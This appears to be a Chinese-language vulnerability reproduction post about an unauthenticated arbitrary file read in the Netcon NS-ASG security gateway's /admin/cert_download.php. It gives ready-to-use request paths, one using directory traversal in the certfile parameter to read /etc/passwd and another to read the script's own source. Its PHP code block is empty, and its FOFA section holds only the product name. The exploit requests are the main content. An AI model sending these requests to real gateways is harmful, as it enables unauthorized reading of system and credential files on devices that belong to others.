# 网康 NS-ASG安全网关 任意文件读取漏洞
## 漏洞描述
网康 NS-ASG安全网关 cert_download.php 文件存在任意文件读取漏洞
## 漏洞影响
> 网康 NS-ASG安全网关
## FOFA
> 网康 NS-ASG安全网关
## 漏洞复现
出现漏洞的文件为 **/admin/cert_download.php**
“`php
“`
此文件没有对身份进行校验即可下载任意文件
“`
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
“`
![](/static/qingy/网康_NS-ASG安全网关_任意文件读取漏洞/img/qax-1.png)
“`
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php
“`
![](/static/qingy/网康_NS-ASG安全网关_任意文件读取漏洞/img/qax-2.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容